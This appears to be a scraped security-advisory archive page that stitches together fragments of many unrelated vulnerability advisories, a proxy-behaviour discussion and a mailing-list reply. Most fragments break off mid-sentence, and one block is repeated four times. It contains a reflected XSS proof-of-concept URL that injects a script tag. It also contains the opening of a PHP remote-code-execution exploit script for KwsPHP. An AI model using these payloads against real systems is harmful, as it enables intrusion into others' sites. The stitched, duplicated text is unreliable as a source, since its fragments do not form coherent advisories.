<< Previous Next >>
HTTP request
RESOLUTION
The vulnerability can be resolved by the following procedure:
Disable the array's HTTP and HTTPS network management services (Note: This will also disable all management access from a Web browser. Array management access may be maintained via Command Line Interface [CLI].) Use the instructions outlined in the Workaround section below to disable the HTTP and HTTPS network management services.
Install TS230P008 firmware as soon as possible. If the HTTP and HTTPS network management services have been previously disabled, the services may be re-enabled as the issue is fully resolved in TS230P008 firmware.
TS230P008 firmware installation and workaround instructions:
Multiple Adobe Products
XML External Entity And XML Injection Vulnerabilities
CVE: CVE-2009-3960
Adobe PSIRT: APSB10-05 - http://www.adobe.com/support/security/bulletins/apsb10-05.html
Link: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
+-----------+
|Description|
+-----------+
Advisory: Geo++(R) GNCASTER: Faulty implementation of HTTP Digest
Authentication
During a penetration test, RedTeam Pentesting discovered that the
GNCaster software has multiple bugs in its implementation of HTTP Digest
Authentication.
Details
=======
Title: CA20090429-01: CA ARCserve Backup Apache HTTP Server
Multiple Vulnerabilities
CA Advisory Reference: CA20090429-01
CA Advisory Date: 2009-04-29
title: Proxy bypass vulnerability & plain text passwords
in LevelOne AMG-2000
product: LevelOne AMG-2000 Wireless AP Management Gateway
vulnerable version: Firmware <=2.00.00build00600
impact: critical
homepage: http://www.level1.com
found: 2008-12-16
by: J. Greil / SEC Consult / www.sec-consult.com
=======================================================================
Vendor description:
BugSec | Security Advisory
Moshe Ben-Abu | Security Expert
Advisory URL (PDF):
http://www.bugsec.com/up_files/OpenNMS_Multiple_Vulnerabilities.pdf
- Table of Contents -
OPENNMS MULTIPLE VULNERABILITIES 1
Cisco Security Advisory: Vulnerability in Cisco IOS While Processing
SSL Packet
Advisory ID: cisco-sa-20080924-ssl
http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml
Revision 1.0
For Public Release 2008 September 24 1600 UTC (GMT)
Rapid7 Advisory R7-0033
Apache HTTP Server mod_proxy_ftp Wildcard Characters Cross-Site Scripting
Discovered: July 25, 2008
Published: August 5, 2008
Revision: 1.1
http://www.rapid7.com/advisories/R7-0033
CVE: CVE-2008-2939
Document ID: 105444
Advisory ID: cisco-sa-20080604-asa
http://www.cisco.com/warp/public/707/cisco-sa-20080604-asa.shtml
Revision 1.0
For Public Release 2008 June 04 1600 UTC (GMT)
issue is different from CAN-2003-0389 and CVE-2005-3329.
Simple XSS Proof of Concept (PoC) URLs:
https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22&authntype=2&username=test&passcode=test
https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22
The injected payload in the previous examples is:
issue is different from CAN-2003-0389 and CVE-2005-3329.
Simple XSS Proof of Concept (PoC) URLs:
https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22&authntype=2&username=test&passcode=test
https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22
The injected payload in the previous examples is:
issue is different from CAN-2003-0389 and CVE-2005-3329.
Simple XSS Proof of Concept (PoC) URLs:
https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22&authntype=2&username=test&passcode=test
https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22
The injected payload in the previous examples is:
issue is different from CAN-2003-0389 and CVE-2005-3329.
Simple XSS Proof of Concept (PoC) URLs:
https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22&authntype=2&username=test&passcode=test
https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22
The injected payload in the previous examples is:
#######################################################################
Luigi Auriemma
Application: 3S CoDeSys
http://www.3s-software.com/index.shtml?en_CoDeSysV3_en
Versions: <= 3.4 SP4 Patch 2
Platforms: Windows
Bugs: A] GatewayService integer overflow
B] CmpWebServer stack overflow
C] CmpWebServer Content-Length NULL pointer
#######################################################################
Luigi Auriemma
Application: Serv-U (FTP)
http://www.serv-u.com
Versions: <= 11.1.0.3
Platforms: Windows, Linux
bug B should affect only some Windows versions
Bugs: A] sockets and ports consumption
B] possible access to the management console
===============================================================================
Author: Janek Vind "waraxe"
Date: 06. April 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-84.html
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Apple CUPS IPP_TAG_UNSUPPORTED Handling null pointer Vulnerability
Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver,
Yaws and Boa log escape sequence injection
Name Nginx, Varnish, Cherokee, thttpd, mini-httpd,
WEBrick, Orion, AOLserver, Yaws and Boa log escape
sequence injection
Systems Affected nginx 0.7.64
Varnish 2.0.6
Cherokee 0.99.30
mini_httpd 1.19
Document ID: 111014
Advisory ID: cisco-sa-20100526-mediator
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
Revision 1.0
For Public Release 2010 May 26 1600 UTC (GMT)
<?php
/*
---KwsPHP All Version / Remote Code Execution---
Faille Discovered By TsukasaGenesis && Ajax
Sploit Coded By Ajax Site: http://www.r57shell.in
*/
if($argc<9){
print "---KwsPHP All Version / Remote Code Execution---\n\n";
print "usage: kwsphpsploit.php -url <url> -login <login> -pass <pass> -email <email> -file <file> [-id <id>]\n\n";
print "Url url of KwsPHP script : Ex : www.example.com/kwsphp/\n";
MSA01240108:
IE7 allows overwriting of several headers leading to Http
request Splitting and smuggling.
Date: March 21th, 2008
Tested Versions:
Internet Explorer 7.0.5730.11
Tested OS:
Cisco IOS SSL VPN Vulnerability
Advisory ID: cisco-sa-20100922-sslvpn
http://www.cisco.com/warp/public/707/cisco-sa-20100922-sslvpn.shtml
Revision 1.0
For Public Release 2010 September 22 1600 UTC (GMT)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - Corelabs Advisory
http://corelabs.coresecurity.com/
Oracle GlassFish Server Administration Console Authentication Bypass
1. *Advisory Information*
Previous, unsupported versions may be affected
Additionally, these vulnerabilities only occur when all of the following
are true:
a) untrusted web applications are being used
b) the SecurityManager is used to limit the untrusted web applications
c) the HTTP NIO or HTTP APR connector is used
d) sendfile is enabled for the connector (this is the default)
Description:
Tomcat provides support for sendfile with the HTTP NIO and HTTP APR
connectors. sendfile is used automatically for content served via the
To be clear, the CONNECT request is a single request/response cycle between the client and the proxy. Any request body is nonsensical and should be ignored by the proxy (or the request can be rejected if the proxy wants to be pedantic). There is nothing that explicitly disallows inclusion of the host header in a CONNECT request. Granted, including the host header incurs some degree of ambiguity (the FQDN may resolve to the IP address, but the IP address is not guaranteed to resolve to the FQDN), but this is clearly a debatable choice on the developer's part as to whether it should be used to determine traffic policy applicability for this request.
The proxy should only ignore further data between the client and remote if the proxy successfully established a TCP connection between them on the specified destination port.
IOW, if the client sends a CONNECT request that the proxy policy allows, the proxy should either queue or reject further communication from the client until the TCP connection has been successfully established and the proxy has responded to the client with "HTTP 200".
If the connection attempt fails, the proxy should provide an HTTP error response to the client and close the client-to-proxy connection.
Likewise, while the proxy does establish the end-to-end TCP connection between the client and upstream server, it is not responsible for any part of the encryption that may be involved in that communication - unless it specifically offers a "trusted MitM" feature such as TMG HTTPS Inspection or Juniper SSL Forward Proxy (other vendors have similar features).
Also, whether the McAffee proxy allows translating normal HTTP methods to CONNECT, then tunneling them to the upstream proxy is irrelevant to the question of whether the local proxy actually uses the host header or the host portion of the CONNECT request to determine policy applicability.
===== Description =====
Multiple XSS vulnerabilities found in the DCP-Portal.
1. common/components/editor/insert_image.php, modules/newsletter/insert_image.php, php/editor.php
The variable $upload_failure_report gets user input from http get request variable "Image" when the action of deleting an uploaded file fails. Later this variable is outputted to the page without proper sanitization.
2. modules/gallery/view_img.php
Page title can be modified by changing the http request variable "imgtitle". Since no sanitizer is used, an XSS occurs on line 2.
Another vulnerability exists if magic quotes is turned off. The http request variable "imagename" gets outputted on the java script function document.write between simple quotes on line 27.
SecureWorks Security Advisory SWRX-2010-001
Cisco ASA HTTP Response Splitting Vulnerability
Advisory Information
Title: Cisco ASA HTTP Response Splitting Vulnerability
Advisory ID: SWRX-2010-001
Advisory URL: http://www.secureworks.com/ctu/advisories/SWRX-2010-001
Date published: Thursday, June 24, 2010
CVE: CVE-2008-7257
Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Chrome Password Manager Cross Origin Weakness
Release Date: 2010-02-15
Tim,
Great writeup of the state of the union for Web-based authentication methods.
As you mention, your paper is primarily an argument for fixing HTTP
auth. That might make a better title for it, in fact, since that does
seem to be the primary thrust of the arguments presented. Or at least,
"If We Wean the Web Off of Session Cookies, This Is Some of What We'd
Have to do". I wasn't convinced at all that Weaning the Web Off of
Session Cookies was the logical conclusion of the data you presented.
On Thu, Jan 28, 2010 at 2:03 PM, James Landis <jcl24@cornell.edu> wrote:
> Tim,
> Great writeup of the state of the union for Web-based authentication methods.
>
> As you mention, your paper is primarily an argument for fixing HTTP
> auth. That might make a better title for it, in fact, since that does
> seem to be the primary thrust of the arguments presented. Or at least,
> "If We Wean the Web Off of Session Cookies, This Is Some of What We'd
> Have to do". I wasn't convinced at all that Weaning the Web Off of
> Session Cookies was the logical conclusion of the data you presented.
<<Previous Next>>
|
